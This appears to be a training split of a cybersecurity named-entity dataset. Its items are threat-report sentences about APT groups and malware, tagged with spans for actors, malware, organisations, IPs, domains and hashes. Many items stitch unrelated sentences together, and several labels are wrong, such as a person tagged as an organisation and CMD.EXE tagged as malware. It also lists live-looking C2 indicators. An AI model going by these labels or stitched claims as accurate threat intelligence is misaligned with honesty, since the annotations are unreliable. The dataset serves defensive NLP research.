{"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]], "MALWARE: Okrum backdoor": [[576, 590]], "MALWARE: Ketrican backdoor": [[610, 627]], "ORGANIZATION: Korean think tank": [[688, 705]], "ORGANIZATION: DPRK/nuclear-related": [[717, 737]]}, "info": {"id": "cyberner_stix_train_002232", "source": "cyberner_stix_train"}}
{"text": "Svpeng is only currently attacking clients of Russian banks . Turla is a notorious group that has been targeting diplomats . Winnti : hpqhvsei.dll . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"MALWARE: Svpeng": [[0, 6]], "THREAT_ACTOR: Turla": [[62, 67]], "ORGANIZATION: diplomats": [[113, 122]], "THREAT_ACTOR: Winnti": [[125, 131]], "FILEPATH: hpqhvsei.dll": [[134, 146]], "ORGANIZATION: Harrison": [[172, 180], [274, 282]], "ORGANIZATION: Ashley Madison": [[221, 235]]}, "info": {"id": "cyberner_stix_train_002233", "source": "cyberner_stix_train"}}
{"text": "Although there are obvious differences between the legitimate file and the malicious one , filtering out the malicious file would involve going through a data set with noise from millions of possible file names , software publishers , and certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_002234", "source": "cyberner_stix_train"}}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel® Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": {"ORGANIZATION: Microsoft": [[29, 38]], "THREAT_ACTOR: PLATINUM": [[71, 79]], "TOOL: Intel® Active Management Technology": [[122, 157]], "TOOL: AMT": [[160, 163]], "TOOL: Serial-over-LAN": [[166, 181]], "TOOL: SOL": [[184, 187]]}, "info": {"id": "cyberner_stix_train_002235", "source": "cyberner_stix_train"}}
{"text": "] cc/3 * * * * * 1 ” . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": {"ORGANIZATION: FBI": [[28, 31]], "THREAT_ACTOR: group": [[72, 77]], "THREAT_ACTOR: APT6": [[84, 88]], "ORGANIZATION: US government": [[101, 114]], "FILEPATH: svchost.exe": [[293, 304]]}, "info": {"id": "cyberner_stix_train_002236", "source": "cyberner_stix_train"}}
{"text": "The email was made to look like as if an investigation report related to Uri terror attack was shared by the MHA official .", "spans": {"TOOL: email": [[4, 9]], "ORGANIZATION: MHA": [[109, 112]]}, "info": {"id": "cyberner_stix_train_002237", "source": "cyberner_stix_train"}}
{"text": "In the actual targeted attack detected by the Hungarian National Security Agency , they used components of the TeamViewer tool combined with other malware modules . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: TeamViewer tool": [[111, 126]], "TOOL: malware modules": [[147, 162]], "ORGANIZATION: security firm": [[182, 195]], "ORGANIZATION: military officials": [[228, 246]], "TOOL: emails": [[266, 272]], "TOOL: Adobe Reader": [[318, 330]], "VULNERABILITY: vulnerability": [[331, 344]]}, "info": {"id": "cyberner_stix_train_002238", "source": "cyberner_stix_train"}}
{"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Winnti installer": [[184, 200]]}, "info": {"id": "cyberner_stix_train_002239", "source": "cyberner_stix_train"}}
{"text": "The service continues by loading an ELF , created by Baidu , which is capable of tracking the device location before setting up a monitor to harvest phone numbers associated with outgoing calls for those numbers with a country code “ +86 ” prefix , which relates to the People ’ s Republic of China . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"ORGANIZATION: Baidu": [[53, 58]], "THREAT_ACTOR: APT41": [[306, 311]], "TOOL: TeamViewer": [[357, 367]], "THREAT_ACTOR: APT28": [[396, 401]], "VULNERABILITY: EternalBlue": [[442, 453]], "VULNERABILITY: exploits": [[454, 462]], "MALWARE: open source tool": [[471, 487]], "MALWARE: Responder": [[488, 497]]}, "info": {"id": "cyberner_stix_train_002240", "source": "cyberner_stix_train"}}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"TOOL: BitPaymer": [[23, 32]], "TOOL: ransomware": [[33, 43]], "THREAT_ACTOR: INDRIK SPIDER": [[204, 217]], "TOOL: Dridex banking trojan": [[243, 264]]}, "info": {"id": "cyberner_stix_train_002241", "source": "cyberner_stix_train"}}
{"text": "Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm .", "spans": {}, "info": {"id": "cyberner_stix_train_002242", "source": "cyberner_stix_train"}}
{"text": "Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": {"TOOL: IoT": [[5, 8]]}, "info": {"id": "cyberner_stix_train_002243", "source": "cyberner_stix_train"}}
{"text": "MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"THREAT_ACTOR: MUMMY SPIDER": [[0, 12]], "TOOL: Emotet": [[103, 109]], "TOOL: Geodo": [[113, 118]], "THREAT_ACTOR: Patchwork": [[131, 140]], "FILEPATH: MS PowerPoint document": [[149, 171]], "VULNERABILITY: CVE-2014-6352": [[197, 210]]}, "info": {"id": "cyberner_stix_train_002244", "source": "cyberner_stix_train"}}
{"text": "Fake SMS message luring users to enter a fake website , which contains the malicious APK ( JPCERT report ) . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": {"ORGANIZATION: JPCERT": [[91, 97]], "TOOL: AdwindRAT": [[156, 165]], "TOOL: RevengeRAT": [[170, 180]], "THREAT_ACTOR: APT33": [[213, 218]], "THREAT_ACTOR: GCMAN": [[268, 273]], "THREAT_ACTOR: Metel Group": [[391, 402]], "ORGANIZATION: banking institutions": [[413, 433]]}, "info": {"id": "cyberner_stix_train_002245", "source": "cyberner_stix_train"}}
{"text": "Also , the software vulnerabilities pointed out in the FOTA software by Strazzere in 2015 could have been taken advantage of by cybercriminals looking to steal bank account details or execute other frauds . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . The actors have also conducted spearphishing .", "spans": {"VULNERABILITY: software vulnerabilities": [[11, 35]], "SYSTEM: FOTA": [[55, 59]], "TOOL: INF files": [[207, 215]], "THREAT_ACTOR: MuddyWater": [[246, 256]], "TOOL: Advpack.dll": [[293, 304]], "TOOL: IEAdvpack.dll": [[313, 326]]}, "info": {"id": "cyberner_stix_train_002246", "source": "cyberner_stix_train"}}
{"text": "Two suspicious artifacts have been retrieved from two separate servers within the Die Linke infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002247", "source": "cyberner_stix_train"}}
{"text": "Zen does n't even check for the root privilege : it just assumes it has it . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"MALWARE: Zen": [[0, 3]], "THREAT_ACTOR: APT16": [[303, 308]]}, "info": {"id": "cyberner_stix_train_002248", "source": "cyberner_stix_train"}}
{"text": "Following the trail further , we traced malicious traffic back to where it originated from and looked for additional evidence to indicate that the attacker persistently used the same infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002249", "source": "cyberner_stix_train"}}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: Middle Eastern human rights activist": [[180, 216]]}, "info": {"id": "cyberner_stix_train_002250", "source": "cyberner_stix_train"}}
{"text": "All of the 4 previously mentioned toolsets were written in a minimalistic style commonly seen with malware ; MiniDuke even goes as far as having many components written in Assembly language .", "spans": {"MALWARE: MiniDuke": [[109, 117]]}, "info": {"id": "cyberner_stix_train_002251", "source": "cyberner_stix_train"}}
{"text": "A complete list of sample hashes is available here . Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens .", "spans": {"MALWARE: Silence.MainModule": [[53, 71]], "MALWARE: CMD.EXE": [[149, 156]], "ORGANIZATION: Jerusalem Post": [[433, 447]], "ORGANIZATION: Palestinian Authority": [[516, 537]], "THREAT_ACTOR: CopyKittens": [[579, 590]]}, "info": {"id": "cyberner_stix_train_002252", "source": "cyberner_stix_train"}}
{"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking . Moreover , they used the same exploit kit Niteris as that in the Corkow case . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": {"SYSTEM: Windows Server": [[204, 218]], "VULNERABILITY: kit Niteris": [[405, 416]], "TOOL: Corkow": [[432, 438]], "ORGANIZATION: McAfee": [[478, 484]], "ORGANIZATION: WikiLeaks": [[525, 534]]}, "info": {"id": "cyberner_stix_train_002254", "source": "cyberner_stix_train"}}
{"text": "] comrose-sturat [ . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) . Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": {"THREAT_ACTOR: RedOctober": [[36, 46]], "ORGANIZATION: Kaspersky Security Network": [[151, 177]], "ORGANIZATION: KSN": [[180, 183]], "THREAT_ACTOR: APT1": [[203, 207]], "TOOL: C2": [[233, 235], [336, 338]]}, "info": {"id": "cyberner_stix_train_002255", "source": "cyberner_stix_train"}}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The oldest sample we've seen up to now is from November 2013 .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]]}, "info": {"id": "cyberner_stix_train_002256", "source": "cyberner_stix_train"}}
{"text": "Figure 6 . Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans . McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": {"THREAT_ACTOR: SWEED": [[35, 40]], "ORGANIZATION: McAfee Advanced Threat Research": [[164, 195]], "ORGANIZATION: critical infrastructure": [[307, 330]], "ORGANIZATION: entertainment": [[333, 346]], "ORGANIZATION: finance": [[349, 356]], "ORGANIZATION: health care": [[359, 370]], "ORGANIZATION: telecommunications": [[377, 395]]}, "info": {"id": "cyberner_stix_train_002257", "source": "cyberner_stix_train"}}
{"text": "But I never received such files from their command and control server . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) . Though our visibility of APT1 ’s activities is incomplete , we have analyzed the group ’s intrusions against nearly 150 victims over seven years . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": {"ORGANIZATION: Political entities": [[72, 90]], "THREAT_ACTOR: IndigoZebra": [[174, 185]], "THREAT_ACTOR: Sofacy": [[188, 194]], "TOOL: Zebrocy malware": [[202, 217]], "TOOL: Octopus malware": [[258, 273]], "THREAT_ACTOR: APT1": [[303, 307]], "SYSTEM: C&C servers": [[453, 464]], "MALWARE: Miniduke": [[468, 476]]}, "info": {"id": "cyberner_stix_train_002258", "source": "cyberner_stix_train"}}
{"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan LOC where a majority of the government of Thailand exists .", "spans": {"TOOL: ISMDoor": [[0, 7]], "MALWARE: Bookworm": [[162, 170]], "TOOL: C2": [[171, 173]], "ORGANIZATION: government": [[246, 256]]}, "info": {"id": "cyberner_stix_train_002259", "source": "cyberner_stix_train"}}
{"text": "Gaza Cybergang Group 1 , also dubbed MoleRATs : MoleRATs has been active since at least 2012 .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "THREAT_ACTOR: MoleRATs": [[37, 45], [48, 56]]}, "info": {"id": "cyberner_stix_train_002260", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : backup.darkhero.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: backup.darkhero.org": [[10, 29]]}, "info": {"id": "cyberner_stix_train_002261", "source": "cyberner_stix_train"}}
{"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": {"TOOL: JBoss": [[52, 57], [125, 130]], "THREAT_ACTOR: PassCV": [[175, 181]]}, "info": {"id": "cyberner_stix_train_002262", "source": "cyberner_stix_train"}}
{"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution . APT1 also used more generic names referencing topics like software : Most do n’t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": {"ORGANIZATION: Citrix": [[121, 127]], "ORGANIZATION: Resecurity": [[275, 285]], "THREAT_ACTOR: APT1": [[324, 328]]}, "info": {"id": "cyberner_stix_train_002263", "source": "cyberner_stix_train"}}
{"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"MALWARE: HenBox": [[0, 6], [127, 133]], "SYSTEM: Android": [[43, 50]], "ORGANIZATION: Cisco": [[200, 205]], "TOOL: control (C2)": [[335, 347]], "THREAT_ACTOR: agroup": [[359, 365]], "ORGANIZATION: media": [[386, 391]], "THREAT_ACTOR: admin@338": [[410, 419]], "MALWARE: remote access Trojans": [[477, 498]], "MALWARE: Poison Ivy": [[507, 517]], "ORGANIZATION: government": [[528, 538]], "ORGANIZATION: financial firms": [[543, 558]], "ORGANIZATION: global economic": [[575, 590]]}, "info": {"id": "cyberner_stix_train_002264", "source": "cyberner_stix_train"}}
{"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents .", "spans": {"ORGANIZATION: 360 Helios Team": [[19, 34]], "THREAT_ACTOR: Poison Ivy Group": [[69, 85]], "ORGANIZATION: national defense": [[192, 208]], "ORGANIZATION: government": [[211, 221]], "ORGANIZATION: science": [[224, 231]], "ORGANIZATION: technology": [[236, 246]], "ORGANIZATION: education": [[249, 258]], "ORGANIZATION: maritime agencies": [[263, 280]], "ORGANIZATION: FireEye": [[359, 366]], "TOOL: email": [[367, 372]], "FILEPATH: malicious documents": [[405, 424]]}, "info": {"id": "cyberner_stix_train_002265", "source": "cyberner_stix_train"}}
{"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": {"SYSTEM: Android 4.4.4": [[15, 28]], "MALWARE: Triada": [[123, 129]], "THREAT_ACTOR: Shadow Brokers": [[210, 224]], "THREAT_ACTOR: Equation": [[286, 294]], "THREAT_ACTOR: APT34": [[303, 308]], "THREAT_ACTOR: OilRig": [[369, 375]]}, "info": {"id": "cyberner_stix_train_002266", "source": "cyberner_stix_train"}}
{"text": "The file is named netwf.dat .", "spans": {"FILEPATH: netwf.dat": [[18, 27]]}, "info": {"id": "cyberner_stix_train_002267", "source": "cyberner_stix_train"}}
{"text": "LEAD also steals code-signing certificates to sign its malware in subsequent attacks .", "spans": {"THREAT_ACTOR: LEAD": [[0, 4]]}, "info": {"id": "cyberner_stix_train_002268", "source": "cyberner_stix_train"}}
{"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails . AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com . As a result , we decided to call this variant FakeSG .", "spans": {"TOOL: Microsoft Exchange": [[132, 150]], "TOOL: Lotus Domino email servers": [[154, 180]], "MALWARE: AveMaria": [[269, 277]], "IP_ADDRESS: 185.61.138.249": [[280, 294]], "DOMAIN: tain.warzonedns.com": [[295, 314]], "DOMAIN: noreply377.ddns.net": [[315, 334]], "IP_ADDRESS: 185.162.131.97": [[335, 349]], "IP_ADDRESS: 91.192.100.62": [[350, 363]], "DOMAIN: server.mtcc.me": [[364, 378]], "DOMAIN: doddyfire.dyndns.org": [[379, 399]], "IP_ADDRESS: 212.8.240.116": [[400, 413]], "IP_ADDRESS: 168.167.45.162": [[414, 428]], "DOMAIN: toekie.ddns.net": [[429, 444]], "DOMAIN: warmaha.warzonedns.com": [[445, 467]], "MALWARE: FakeSG": [[516, 522]]}, "info": {"id": "cyberner_stix_train_002269", "source": "cyberner_stix_train"}}
{"text": "They should still be on the lookout for these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 . OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 . KillNet Appears to Increase Capabilities", "spans": {"ORGANIZATION: PwC UK": [[170, 176]], "ORGANIZATION: BAE Systems": [[181, 192]], "THREAT_ACTOR: APT10": [[268, 273]], "THREAT_ACTOR: OceanLotus": [[276, 286]], "FILEPATH: a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e": [[289, 353]]}, "info": {"id": "cyberner_stix_train_002270", "source": "cyberner_stix_train"}}
{"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked – com.mile.brain , Packed – com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": {"SYSTEM: Google Play": [[168, 179]], "ORGANIZATION: Unit 42": [[291, 298]], "MALWARE: EPS files": [[371, 380]], "VULNERABILITY: CVE-2015-2545": [[395, 408]], "VULNERABILITY: CVE-2017-0261": [[413, 426]], "MALWARE: Quasar": [[508, 514]], "MALWARE: malware": [[515, 522]], "MALWARE: ChChes": [[578, 584]], "MALWARE: RedLeaves": [[589, 598]]}, "info": {"id": "cyberner_stix_train_002271", "source": "cyberner_stix_train"}}
{"text": "More likely , this is a case of common attack tools being re-used between different threat actor groups . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": {"MALWARE: HIGHNOON": [[128, 136]], "THREAT_ACTOR: Winnti": [[175, 181]], "THREAT_ACTOR: Sofacy threat group": [[355, 374]], "ORGANIZATION: government organizations": [[395, 419]], "MALWARE: Zebrocy tool": [[477, 489]]}, "info": {"id": "cyberner_stix_train_002272", "source": "cyberner_stix_train"}}
{"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . Rmcmd : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"THREAT_ACTOR: actor": [[111, 116]], "ORGANIZATION: defense entities": [[174, 190]], "ORGANIZATION: Talos": [[242, 247]], "THREAT_ACTOR: RA Group": [[284, 292]], "MALWARE: Babuk source code": [[378, 395]]}, "info": {"id": "cyberner_stix_train_002273", "source": "cyberner_stix_train"}}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[111, 130]], "ORGANIZATION: biotechnology": [[151, 164]], "ORGANIZATION: electronics manufacturing": [[167, 192]], "ORGANIZATION: industrial chemistry": [[199, 219]], "ORGANIZATION: WildFire": [[245, 253]], "TOOL: e-mail": [[271, 277]], "TOOL: Word": [[291, 295], [362, 366]], "FILEPATH: hello.docx": [[309, 319]], "ORGANIZATION: Government": [[403, 413]]}, "info": {"id": "cyberner_stix_train_002274", "source": "cyberner_stix_train"}}
{"text": "In 2011 MSK stopped following Daylight Saving Time ( DST ) and was set to UTC+4 year-round , then reset to UTC +3 yearround in 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002275", "source": "cyberner_stix_train"}}
{"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": {"THREAT_ACTOR: OilRig": [[20, 26]], "THREAT_ACTOR: threat group": [[27, 39]], "MALWARE: MoonWind samples": [[257, 273]], "MALWARE: RAR files": [[277, 286]], "MALWARE: RATs": [[323, 327]]}, "info": {"id": "cyberner_stix_train_002276", "source": "cyberner_stix_train"}}
{"text": "The Federal Service for Technical and Export Control ( FTEC ) which is responsible for export control , intellectual property , and protecting confidential information .", "spans": {"ORGANIZATION: Federal Service for Technical and Export Control": [[4, 52]], "ORGANIZATION: FTEC": [[55, 59]]}, "info": {"id": "cyberner_stix_train_002277", "source": "cyberner_stix_train"}}
{"text": "Suite 3000 was repeatedly found in each instance .", "spans": {}, "info": {"id": "cyberner_stix_train_002278", "source": "cyberner_stix_train"}}
{"text": "The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"MALWARE: regsvr32.exe": [[4, 16]], "MALWARE: SCT file": [[121, 129]], "ORGANIZATION: Political entities": [[147, 165]], "THREAT_ACTOR: IndigoZebra": [[249, 260]], "THREAT_ACTOR: Sofacy": [[263, 269]], "MALWARE: Zebrocy": [[277, 284]], "MALWARE: malware": [[285, 292], [341, 348]], "MALWARE: Octopus": [[333, 340]]}, "info": {"id": "cyberner_stix_train_002279", "source": "cyberner_stix_train"}}
{"text": "Analysis of the additional spyware modules is future work . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) . The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine . Another detection opportunity identified by Mandiant was source IP addresses that access multiple user accounts in a short period of time recorded in the ns.log files or forwarded logs via syslog .", "spans": {"TOOL: PlugX": [[81, 86]], "TOOL: Poison Ivy": [[91, 101]], "TOOL: PIVY": [[104, 108]], "THREAT_ACTOR: group": [[142, 147]], "TOOL: ChChes": [[187, 193]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[203, 261]], "ORGANIZATION: JPCERT": [[264, 270]], "TOOL: C2": [[348, 350]], "TOOL: CComCriticalSection": [[428, 447]]}, "info": {"id": "cyberner_stix_train_002280", "source": "cyberner_stix_train"}}
{"text": "As we saw in both 2016 and 2017 , disruptions to Necurs went hand-in-hand with quiet periods from TA505 .", "spans": {"MALWARE: Necurs": [[49, 55]], "THREAT_ACTOR: TA505": [[98, 103]]}, "info": {"id": "cyberner_stix_train_002281", "source": "cyberner_stix_train"}}
{"text": "Code structure Obviously , this code is not obfuscated when compared with the previous version it becomes clear that this is the same code base . Chafer , uses Backdoor.Remexi . These documents were also emailed to organizations in Japan and Taiwan . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": {"TOOL: Backdoor.Remexi": [[160, 175]], "THREAT_ACTOR: threat actors": [[270, 283]]}, "info": {"id": "cyberner_stix_train_002282", "source": "cyberner_stix_train"}}
{"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption . As a result , it is already flagged as Bahamut by antivirus engines . The architecture of this dropper is different from the others : it starts extracting the main driver from itself . A new report from the Malwarebytes Threat Intelligence team shows 1,900 total ransomware attacks within just four countries — the US , Germany , France , and the UK — in one year .", "spans": {"ORGANIZATION: Malwarebytes Threat Intelligence team": [[369, 406]]}, "info": {"id": "cyberner_stix_train_002283", "source": "cyberner_stix_train"}}
{"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial ) In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": {"SYSTEM: Android": [[46, 53]], "THREAT_ACTOR: Operation Cleaver": [[239, 256]], "TOOL: mblock_t : :s erial": [[450, 469]], "THREAT_ACTOR: Winnti group": [[486, 498]], "ORGANIZATION: gaming companies": [[520, 536]], "MALWARE: self - named data- and file - stealing malware": [[560, 606]]}, "info": {"id": "cyberner_stix_train_002284", "source": "cyberner_stix_train"}}
{"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials . The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users . – Consistent with KillNet activity in 2022 , the majority of claimed attacks in 2023 targeted entities in the U.S. and Europe .", "spans": {"THREAT_ACTOR: APT10": [[134, 139]], "TOOL: MSP": [[172, 175]], "ORGANIZATION: MSPs": [[202, 206]], "THREAT_ACTOR: KillNet activity": [[363, 379]]}, "info": {"id": "cyberner_stix_train_002285", "source": "cyberner_stix_train"}}
{"text": "This is custom malware , which despite large file size ( 1,1 MB ) , provides limited functionality .", "spans": {}, "info": {"id": "cyberner_stix_train_002286", "source": "cyberner_stix_train"}}
{"text": "The majority of the overall samples came from the following four sites :", "spans": {}, "info": {"id": "cyberner_stix_train_002287", "source": "cyberner_stix_train"}}
{"text": "These targets have included organizations such as ministries of foreign affairs , embassies , senates , parliaments , ministries of defense , defense contractors , and think tanks .", "spans": {}, "info": {"id": "cyberner_stix_train_002288", "source": "cyberner_stix_train"}}
{"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a", "spans": {"FILEPATH: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[0, 64]]}, "info": {"id": "cyberner_stix_train_002289", "source": "cyberner_stix_train"}}
